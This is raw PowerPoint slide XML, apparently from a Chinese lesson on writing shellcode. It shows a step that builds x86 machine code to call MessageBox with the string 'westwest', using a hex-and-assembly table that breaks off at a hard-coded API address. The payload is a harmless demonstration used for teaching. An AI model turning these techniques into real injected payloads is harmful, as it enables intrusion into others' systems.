        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45996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26" presetClass="emph" presetSubtype="0" repeatCount="2000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="13"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56D10B41-3824-4948-AFA3-7256B2F988D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3941615" y="736005"/>
            <a:ext cx="4801314" cy="576064"/>
            <a:chOff x="3941615" y="736005"/>
            <a:chExt cx="4801314" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6978420B-79F3-4824-8BD4-CFA1BB7B5C73}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4269135" y="1312069"/>
              <a:ext cx="4320480"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CBED80BB-7341-4959-B54E-74E2D8E3677B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3941615" y="736005"/>
              <a:ext cx="4801314"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第二步：编写函数调用的汇编代码</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A58EC0BB-00B1-4187-AF63-CB46D6082565}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="740743" y="1312069"/>
            <a:ext cx="11377264" cy="729383"/>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0050A3"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>编写函数调用的汇编代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>：先把字符串“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>westwest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>压入栈区，消息框的文本和标题都显示为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>westwest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>，只要重复压入指向这个字符串的指针即可；第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>个和第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>个参数这里都将设置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="表格 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFAB6920-121A-4245-9F16-80A2AFD8223C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3876198721"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="740743" y="2248173"/>
          <a:ext cx="11377264" cy="4738855"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2304256">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2808312">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6264696">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="327940">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>机器代码（十六进制）</a:t>
                      </a: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800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>汇编指令</a:t>
                      </a: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800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>注释</a:t>
                      </a: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6077">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>33 DB</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="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800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>XOR  EBX,EBX</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="10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800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>将</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>EBX</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>的值设置为</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="10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6077">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>53</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="10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800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>PUSH  EBX</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="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800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>将</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>EBX</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>的值入栈</a:t>
                      </a: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6077">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>68 77 65 73 74</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="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800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>PUSH  74736577</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="10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800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>将字符串</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>west</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>入栈</a:t>
                      </a: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06077">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>68 77 65 73 74</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="10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800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>PUSH  74736577</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="10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800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>将字符串</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>west</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>入栈</a:t>
                      </a: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12154">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>8B C4</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="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800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>MOV  EAX,ESP</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="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800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>将栈顶指针存入</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>EAX</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>（栈顶指针的值就是字符串的首地址）</a:t>
                      </a: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06077">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>53</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="10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800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>PUSH   EBX</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="10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800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>入栈</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100" dirty="0" err="1">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Messagebox</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>的参数</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>类型</a:t>
                      </a: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06077">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>50</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="10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800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>PUSH   EAX</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="10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800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>入栈</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100" dirty="0" err="1">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Messagebox</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>的参数</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>标题</a:t>
                      </a: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06077">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>50</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="10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800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>PUSH   EAX</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="10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800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>入栈</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100" dirty="0" err="1">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Messagebox</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>的参数</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>消息</a:t>
                      </a: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06077">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>53</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="10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800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>PUSH   EBX</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="10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800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>入栈</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100" dirty="0" err="1">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Messagebox</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>的参数</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>句柄</a:t>
                      </a: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06077">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>B8 EA 07 D5 77</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="10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800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>MOV EAX, 0x77D507EA</a:t>
                      </a:r>
